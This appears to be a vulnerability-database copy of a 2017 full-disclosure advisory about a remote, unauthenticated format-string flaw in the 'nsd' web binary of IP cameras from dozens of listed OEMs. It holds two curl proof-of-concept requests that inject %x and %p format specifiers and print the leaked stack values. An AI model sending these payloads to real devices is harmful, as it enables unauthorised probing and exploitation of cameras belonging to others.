Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

nsd Format String

🗓️ 17 Dec 2017 00:00:00Reported by bashisType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 67 Views

Remote Stack Format String vulnerability in 'nsd' binary from multiple OEM, affecting a wide range of IP camera brand

Code
`[STX]  
  
Subject: Remote Stack Format String in 'nsd' binary from multiple OEM  
  
Attack vector: Remote  
Authentication: Anonymous (no credentials needed)  
Researcher: bashis <mcw noemail eu> (December 2017)  
PoC: https://github.com/mcw0/PoC  
Release date: December 14, 2017  
Full Disclosure: 0-Day  
  
  
-[ PoC ]-  
  
1)  
$ curl 'http://[IP:PORT]/main/index.asp?ID=AAAA|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x&lg=BBBB'  
  
[...]  
function initHideWidget(){  
document.getElementById("devip").value = "192.168.57.20";  
document.getElementById("cameraid").value = 1;  
document.getElementById("streamid").value = 1;  
document.getElementById("id").value = "AAAA|5e2ff9f8|ffffffff|5e3006db|ea60|1|2|1|1|0|20cd3e0|7263733c|20747069";  
document.getElementById("lg").value = "BBBB";  
document.getElementById("port").value = 60000;  
document.getElementById("ipver").value = 1;  
document.getElementById("tprotocol").value = 2;  
document.getElementById("devtype").value = 1;  
document.getElementById("ismotorize").value = 1;  
  
[...]  
Note: 'BBBB' are hiding within '5e3006db'  
  
2)  
curl -v "http://[IP:PORT]/Maintain/upgrade.asp?ID=|%p|%p|%p|%p|%p|%p"  
[...]  
function initHideWidget(){  
document.getElementById("ip").value = "192.168.57.20";  
document.getElementById("id").value = "|0x5d300484|0xffffffff|0xea60|0x1|0x2|0x1";  
document.getElementById("port").value = 60000;  
document.getElementById("ipver").value = 1;  
document.getElementById("tprotocol").value = 2;  
document.getElementById("devtype").value = 1;  
[...]  
  
  
-[ Affected OEM ]-  
  
Huatu  
I-View  
IP Camera Web Service  
Stanley Security  
3D Eyes CCTV Platform  
Protech Srl  
LS vision   
GWSECU  
12 Legion Solution  
HDVuk IP Camera  
Intervid Security  
Suzuki Tech  
Wellsite IP Camera  
iBrido  
Protec IP Camera  
Maxtron IP Camera  
Ascendent  
GTvs IP Camera  
Squilla  
Bikal IP Camera  
MW Power  
Alfa Vision  
KMA Security  
Tough Dog Security  
Kpro HQ  
Lanetwork  
AFM Vision  
ZetaDo  
Jobsight Inc.  
Datalab IP Technologies  
4Tvision  
Proline UK  
Tanz  
Aisonic  
HD-IP  
PreSec Security Solution  
EagleVision  
Elemis Delta  
Imenara  
Gigamedia  
Xavee  
Honeywell  
Boss Security  
A.R.T Surveillance  
Global Security  
Securicorp  
Securetech  
Vapplica  
Star  
Stic  
NeXus  
Alnet  
Spy Smart  
Kompsos  
Adler Security Systems  
Nextan  
Access  
Toprotect  
Kawah  
LS StrateX  
Senpei CCTV  
Metcom  
AFM Vision  
Doron Technologies  
Saviour Smart IoT Systems  
Eagle-Eye  
Faucon.at  
BlueEagle Security  
Campro  
Opple  
Level One  
Video and Monitor System  
K&D  
  
[ETX]  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Dec 2017 00:00Current
7.4High risk
Vulners AI Score7.4
remote stack format | nsd binary | oem | vulnerability | ip camera | exploit
67